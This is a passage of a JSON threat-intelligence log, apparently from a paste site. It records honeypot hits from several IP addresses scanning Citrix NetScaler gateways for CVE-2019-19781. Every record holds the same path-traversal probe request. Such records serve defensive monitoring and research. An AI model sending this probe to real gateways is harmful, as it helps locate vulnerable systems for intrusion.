- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-01-09T21:58:10Z",
- "last_seen": "2020-01-09T23:51:36Z"
- },
- {
- "source_ip_address": "139.162.189.189",
- "country": "DE",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-01-09T17:46:04Z",
- "last_seen": "2020-01-09T23:48:08Z"
- },
- {
- "source_ip_address": "173.255.200.120",
- "country": "US",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 321,
- "first_seen": "2020-01-09T15:27:14Z",
- "last_seen": "2020-01-09T23:24:09Z"
- },
- {
- "source_ip_address": "45.79.129.215",
- "country": "US",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-01-09T21:43:56Z",
- "last_seen": "2020-01-09T21:43:56Z"
- },
- {
- "source_ip_address": "172.104.210.59",
- "country": "US",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-09T20:13:04Z",
- "last_seen": "2020-01-09T20:13:04Z"
- },
- {
- "source_ip_address": "139.59.212.187",
- "country": "DE",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 16,
- "first_seen": "2020-01-09T16:21:44Z",
- "last_seen": "2020-01-09T20:09:27Z"
- },
- {
- "source_ip_address": "69.164.202.142",
- "country": "US",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-09T19:45:08Z",
- "last_seen": "2020-01-09T19:45:08Z"
- },
- {
- "source_ip_address": "45.79.29.24",
- "country": "US",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-01-09T19:23:01Z",
- "last_seen": "2020-01-09T19:23:01Z"
- },
- {
- "source_ip_address": "45.33.92.155",
- "country": "US",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 156,
- "first_seen": "2020-01-09T16:43:03Z",
- "last_seen": "2020-01-09T16:43:03Z"
- },
- {
- "source_ip_address": "142.93.150.124",
- "country": "CA",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 8,
- "first_seen": "2020-01-09T16:21:38Z",
- "last_seen": "2020-01-09T16:21:38Z"
- }
- ]
- }
Advertisement
Add Comment
Please, Sign In to add comment